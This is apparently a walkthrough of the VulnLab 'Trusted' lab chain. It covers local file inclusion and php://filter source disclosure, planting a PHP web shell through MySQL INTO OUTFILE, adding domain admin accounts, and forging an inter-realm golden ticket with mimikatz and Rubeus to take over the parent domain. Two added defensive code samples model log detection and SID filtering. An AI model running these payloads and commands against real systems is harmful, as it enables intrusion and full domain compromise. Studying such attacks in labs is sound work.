TRUSTED – VULNLAB

This is a write-up/walkthrough of the TRUSTED chain machine from VULNLAB.

This machine is a chain of two machines: a child domain and a parent domain.

NMAP SCAN for PARENT Domain: 10.10.133.229

53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:19:27Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
SNIP
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-12T13:19:39+00:00

Domain: trusted.vl, NetBIOS computer name: TRUSTEDDC

NMAP SCAN for CHILD Domain: 10.10.133.230

53/tcp   open  domain        syn-ack Simple DNS Plus
80/tcp   open  http          syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.151.102/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:11:47Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3306/tcp open  mysql         syn-ack MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 12
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, SupportsCompression, LongColumnFlag, SupportsTransactions, Support41Auth, ODBCClient, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, IgnoreSigpipes, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: ;^I3buG?E~l%mw.}NKnj
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-08-12T13:12:08+00:00; +2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-12T13:12:00+00:00

Domain: lab.trusted.vl, NetBIOS computer name: LABDC

Found the child DC: LABDC.LAB.TRUSTED.VL and the parent DC: TRUSTEDDC.TRUSTED.VL

Running gobuster against the child DC (LABDC) web server:

/aux                  (Status: 403) [Size: 302]
/cgi-bin/             (Status: 403) [Size: 302]
/com1                 (Status: 403) [Size: 302]
/com4                 (Status: 403) [Size: 302]
/com3                 (Status: 403) [Size: 302]
/com2                 (Status: 403) [Size: 302]
/con                  (Status: 403) [Size: 302]
/dashboard            (Status: 301) [Size: 342] [--> http://10.10.133.230/dashboard/]
/dev                  (Status: 301) [Size: 336] [--> http://10.10.133.230/dev/]
/examples             (Status: 503) [Size: 402]
/favicon.ico          (Status: 200) [Size: 30894]
/img                  (Status: 301) [Size: 336] [--> http://10.10.133.230/img/]
/licenses             (Status: 403) [Size: 421]
/lpt1                 (Status: 403) [Size: 302]
/lpt2                 (Status: 403) [Size: 302]
/nul                  (Status: 403) [Size: 302]
/phpmyadmin           (Status: 403) [Size: 302]
/prn                  (Status: 403) [Size: 302]
/secci�               (Status: 403) [Size: 302]
/server-info          (Status: 403) [Size: 421]
/server-status        (Status: 403) [Size: 421]
/webalizer            (Status: 403) [Size: 302]
/xampp                (Status: 301) [Size: 338] [--> http://10.10.133.230/xampp/]

Browsing to the /dev directory I found a simple website. Its About page loads about.html through a view parameter to render the page content, so I tried a file disclosure (local file inclusion) payload and it worked: since this is a Windows machine, I requested the hosts file and its content was returned.

Payload: http://10.10.187.166/dev/index.html?view=C:\Windows\System32\drivers\etc\hosts

Enumerating for more files in the /dev directory (C:\xampp\htdocs\dev on disk) with gobuster and the php extension found db.php. Including db.php only printed "connected successfully", because the PHP was executed rather than displayed.

gobuster dir -x php -w /usr/share/wordlist/dirb/big.txt -u http://10.10.187.166/dev/

To read the source of db.php, I used the php://filter wrapper with convert.base64-encode, which returns the file base64-encoded, and decoded the result:

http://10.10.187.166/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php
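A defender's view of the two requests above, as an added example that is not from the original write-up: a small Python scanner that flags file-inclusion style values (PHP stream wrappers, traversal, absolute paths) in the view parameter of Apache access log lines. The log lines are constructed samples, not logs from the lab.

```python
# Added example (not from the original write-up): flag local-file-inclusion and
# php://filter requests like the ones above in Apache access logs.
# The log lines below are constructed samples in Apache combined log format.
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_LOG = """\
10.8.0.5 - - [12/Aug/2023:13:40:01 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.8.0.5 - - [12/Aug/2023:13:41:12 +0000] "GET /dev/index.html?view=C:\\Windows\\System32\\drivers\\etc\\hosts HTTP/1.1" 200 824 "-" "curl/7.88"
10.8.0.5 - - [12/Aug/2023:13:42:30 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=C:\\xampp\\htdocs\\dev\\db.php HTTP/1.1" 200 412 "-" "curl/7.88"
10.8.0.5 - - [12/Aug/2023:13:43:05 +0000] "GET /dev/index.html?view=..%2F..%2Fxampp%2Fhtdocs%2Fdev%2Fdb.php HTTP/1.1" 200 412 "-" "curl/7.88"
10.8.0.5 - - [12/Aug/2023:13:44:00 +0000] "GET /dev/img/logo.png HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

# Indicators for include-style parameters: PHP stream wrappers, directory traversal,
# and absolute Windows (C:\...) or UNIX (/...) paths.
SUSPICIOUS = [
    ("php_wrapper", re.compile(r"^(php|data|expect|phar|zip)://", re.I)),
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("absolute_path", re.compile(r"^([a-z]:[\\/]|[\\/])", re.I)),
]
INCLUDE_PARAMS = {"view", "page", "file", "include"}  # parameter names worth checking

def classify_value(value):
    """Return the indicator names matching one parameter value (already decoded once by parse_qs)."""
    decoded = unquote(value)  # decode a second time to catch double-encoded traversal
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]

def scan_access_log(text):
    """Return (ip, url, param, indicators) for each suspicious include-style request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["url"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            if param.lower() not in INCLUDE_PARAMS:
                continue
            for v in values:
                inds = classify_value(v)
                if inds:
                    hits.append((m["ip"], m["url"], param, inds))
    return hits
```

Running scan_access_log(SAMPLE_LOG) reports the hosts-file read, the php://filter request and the traversal attempt, and ignores the two benign requests.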

After decoding the base64 I found the MySQL credentials. Since port 3306 is open, I logged in with them:

mysql -u root -h 10.10.187.166 -p

Enumerating the databases and tables turned up some users and their MD5 hashes. I tried cracking all of them, but only Robert's hash cracked, giving the password "IHateEric2".

I then tried this credential against SMB with crackmapexec, but got no response. Instead, I used the MySQL access to write a new PHP file into the /dev directory for executing system commands:

select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php';

Browsing to /dev/back.php?c=whoami showed that the web server is running as SYSTEM.

After that I tried many ways to get a reverse shell, but none of them worked, so I simply added a new user to the domain and put it in the "Administrators" group:

back.php?c=net user kunal hacker@123 /add /domain
back.php?c=net localgroup Administrators kunal /add /domain

Then I connected with evil-winrm and also added the user to the "Domain Admins" group:

evil-winrm -u kunal -p hacker@123 -i 10.10.187.166
PS C:\Users\kunal\Documents> net group "Domain Admins" kunal /add /domain

Got Users.txt from the Administrator's Desktop folder.

Next, to enumerate the domain, I uploaded PowerView.ps1 with evil-winrm's upload function and connected as the newly created user over RDP.

Over RDP, I opened PowerShell and imported PowerView.ps1:

. .\PowerView.ps1
OR

Import-Module .\PowerView.ps1

To pivot from the child to the parent domain, I first have to confirm that the trust is bidirectional.

Enumerating the forest shows two domains: trusted.vl, the parent (forest root), and lab.trusted.vl, the child:

Get-ForestDomain

Looking at the trust to the parent domain, I found that it is bidirectional:

Get-DomainTrust

Since TrustDirection is Bidirectional, I can abuse this trust to reach the parent domain, but first I need a few tools and some information about the domains.

To abuse the trust, I have to collect the SID of the child domain, the SID of the parent domain, and the inter-realm trust key in RC4 format.

Getting the SIDs of the child and parent domains with PowerView:

# for the current domain, which is the child domain
Get-DomainSID
# for the parent domain, trusted.vl; append -519 (the Enterprise Admins RID) to this SID
Get-DomainSID -Domain trusted.vl

Append -519 to the end of the root domain SID.

To retrieve the inter-realm trust key as an RC4 hash, I uploaded mimikatz.exe with evil-winrm's upload function, connected over RDP and opened cmd as administrator:

mimikatz # privilege::debug
mimikatz # lsadump::trust /patch

Always copy the rc4 value from the [ In ] entry, and check the trust direction. I am pivoting from child to parent, so the entry I need is: [ In ] LAB.TRUSTED.VL → TRUSTED.VL

Download BetterSafetyKatz.exe from here.

With all the details collected, I used BetterSafetyKatz.exe as Administrator to forge the inter-realm TGT with the following command, saving the ticket to trust_tkt.kirbi for requesting service tickets later:

.\BetterSafetyKatz.exe "kerberos::golden /user:administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:6bcc0ff781f2703112cd0f8f0af5763d /service:krbtgt /target:trusted.vl /ticket:C:\users\kunal\documents\trust_tkt.kirbi" "exit"
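Why the parent DC honours this ticket, as an added example that is not part of the original write-up: a simplified Python model of SID filtering run over the SIDs the command above puts in the ticket. A parent/child trust inside one forest does not quarantine SIDs from other domains of the forest, so the Enterprise Admins SID in the ticket's SID history is accepted; the same model with quarantine enabled drops it. The domain SIDs are the ones from this write-up; the function names and the reduced rule set are my own simplification.

```python
# Added example (not from the original write-up): a simplified model of SID filtering
# applied to the extra SIDs carried by the forged inter-realm ticket above.
# The domain SIDs are the child/parent SIDs collected in the write-up; the rules are a
# simplification of Windows trust quarantine, written here for illustration only.
CHILD_DOMAIN_SID = "S-1-5-21-2241985869-2159962460-1278545866"   # lab.trusted.vl
PARENT_DOMAIN_SID = "S-1-5-21-3576695518-347000760-3731839591"   # trusted.vl

ENTERPRISE_ADMINS_RID = 519
DOMAIN_ADMINS_RID = 512

def split_sid(sid):
    """Return (domain_identifier, rid) for an account/group SID such as S-1-5-21-x-y-z-519."""
    parts = sid.split("-")
    if len(parts) < 8 or parts[:3] != ["S", "1", "5"] or parts[3] != "21":
        raise ValueError(f"not a domain account SID: {sid}")
    return "-".join(parts[:-1]), int(parts[-1])

def sid_filter(issuing_domain_sid, extra_sids, quarantine):
    """Model of how the trusting DC treats the ExtraSids (SID history) in a ticket.

    quarantine=False: the default for a parent/child trust inside one forest; SIDs from
    any domain of the forest are accepted as they are.
    quarantine=True:  only SIDs whose domain part equals the issuing (trusted) domain
    survive; anything claiming membership in another domain is dropped.
    """
    if not quarantine:
        return list(extra_sids)
    return [s for s in extra_sids if split_sid(s)[0] == issuing_domain_sid]

def escalation_sids(issuing_domain_sid, extra_sids, quarantine=False):
    """Return the EA/DA SIDs of a *different* domain that would still be honoured."""
    flagged = []
    for s in sid_filter(issuing_domain_sid, extra_sids, quarantine):
        domain, rid = split_sid(s)
        if domain != issuing_domain_sid and rid in (ENTERPRISE_ADMINS_RID, DOMAIN_ADMINS_RID):
            flagged.append(s)
    return flagged

# The /sids value used in the BetterSafetyKatz command above.
FORGED_EXTRA_SIDS = [PARENT_DOMAIN_SID + "-519"]
```

escalation_sids(CHILD_DOMAIN_SID, FORGED_EXTRA_SIDS) returns the parent's Enterprise Admins SID, while the quarantine=True variant returns an empty list.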

With the ticket saved, I used Rubeus.exe as Administrator to request a service ticket for the HTTP service on the root DC, so that I can connect with WinRM:

Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:http/trusteddc.trusted.vl /dc:trusteddc.trusted.vl /ptt

Checking the injected ticket with klist:

klist

Using winrs to connect to trusteddc.trusted.vl:

winrs -r:trusteddc.trusted.vl cmd

I tried reading root.txt, but access was denied.

After that, I copied mimikatz.exe to trusteddc.trusted.vl and dumped the Administrator hash with DCSync:

# copying mimikatz.exe to trusteddc.trusted.vl
copy mimikatz.exe \\trusteddc.trusted.vl\c$
# dumping the Administrator hash
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /user:trusted\administrator

With the Administrator hash, I used evil-winrm with pass-the-hash to log in as Administrator and read root.txt:

evil-winrm -u administrator -H "ADMINISTRATOR-HASH-HERE" -i PARENT-DOMAIN-IP

If you face any problems, let me know in the comment.
